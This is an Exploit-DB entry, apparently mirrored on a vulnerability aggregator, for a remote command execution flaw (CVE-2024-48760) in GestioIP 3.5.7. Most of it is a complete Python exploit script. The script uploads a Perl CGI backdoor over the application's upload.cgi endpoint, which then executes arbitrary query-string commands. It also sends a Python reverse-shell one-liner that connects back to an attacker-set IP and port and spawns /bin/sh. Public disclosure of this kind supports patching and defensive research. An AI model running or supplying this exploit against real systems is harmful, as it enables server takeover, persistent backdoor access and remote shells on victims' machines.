GestioIP 3.5.7 - Remote Command Execution (RCE)

🗓️ 14 Apr 2025 00:00:00Reported by Maximiliano BelinoType

exploitdb🔗 www.exploit-db.com👁 241 Views

GestioIP 3.5.7 has a Remote Command Execution vulnerability allowing attackers to execute commands.

Reporter	Title	Published	Views	Family All 15
ATTACKERKB	CVE-2024-48760	14 Jan 202522:15	–	attackerkb
Circl	CVE-2024-48760	15 Jan 202500:03	–	circl
CNNVD	GestioIP 操作系统命令注入漏洞	14 Jan 202500:00	–	cnnvd
CVE	CVE-2024-48760	14 Jan 202500:00	–	cve
Cvelist	CVE-2024-48760	14 Jan 202500:00	–	cvelist
Metasploit	GestioIP 3.5.7 Remote Command Execution	14 May 202619:00	–	metasploit
NVD	CVE-2024-48760	14 Jan 202522:15	–	nvd
OSV	CVE-2024-48760	14 Jan 202522:15	–	osv
Packet Storm	📄 GestioIP 3.5.7 Remote Command Execution	15 Apr 202500:00	–	packetstorm
Packet Storm	📄 GestioIP 3.5.7 Remote Command Execution	14 May 202600:00	–	packetstorm

# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-48760

import requests
import sys

# Config
username = "gipadmin"
password = "PASSWORD"
domain = "localhost"
local_ip = "10.20.0.1"
local_port = 443
target_url = f"http://{domain}/gestioip/api/upload.cgi"

# CGI Backdoor Perl
backdoor_code = """#!/usr/bin/perl -w

use strict;

print "Cache-Control: no-cache\\n";
print "Content-type: text/html\\n\\n";

my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g; 
$req =~ s/%3b/;/g;
$req =~ s/%7c/|/gi;
$req =~ s/%27/'/g;
$req =~ s/%22/"/g;
$req =~ s/%5D/]/g;
$req =~ s/%5B/[/g;

print "<html><body>";
print '<!-- CGI backdoor -->';

if (!$req) {
    print "Usage: http://domain/gestioip/api/upload.cgi?whoami";
} else {
    print "Executing: $req";
}

print "<pre>";
my @cmd = `$req`;
print "</pre>";

foreach my $line (@cmd) {
    print $line . "<br/>";
}

print "</body></html>";
"""

# Exploit functions
def upload_file(session, file_name, file_data):
    """Uploads the file to the server"""
    files = {
        'file_name': (None, file_name),
        'leases_file': (file_name, file_data)
    }
    response = session.post(target_url, files=files)
    if "OK" not in response.text:
        print(f"[!] Error uploading {file_name}.")
        sys.exit(1)
    return response

def run_command(session, cmd):
    """Execute a command in the server through the vuln"""
    url = target_url + '?' + cmd
    resp = session.get(url)
    print(resp.text)

def backdoor_exists(session):
    """Verifies if backdoor is already uploaded or not"""
    response = session.get(target_url + "?whoami")
    if "www-data" in response.text:
        return True  # backdoor already uploaded
    return False  # backdoor not uploaded yet

if __name__ == '__main__':
    with requests.Session() as session:
        session.auth = (username, password)

        # Verify if backdoor is already uploaded
        if not backdoor_exists(session):
            print("\n[!] Uploading backdoor...\n")
            upload_file(session, 'upload.cgi', backdoor_code)
        else:
            print("\n[+] Backdoor already uploaded. Continue...\n")

        # Execute the reverse shell
        print("\n[!] Executing reverse shell...\n")
        reverse_shell_cmd = f'python3 -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{local_ip}\', {local_port})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([\'/bin/sh\', \'-i\']);"'
        run_command(session, reverse_shell_cmd)

14 Apr 2025 00:00Current

7.1High risk

Vulners AI Score7.1

CVSS 3.19.8

EPSS0.60972

SSVC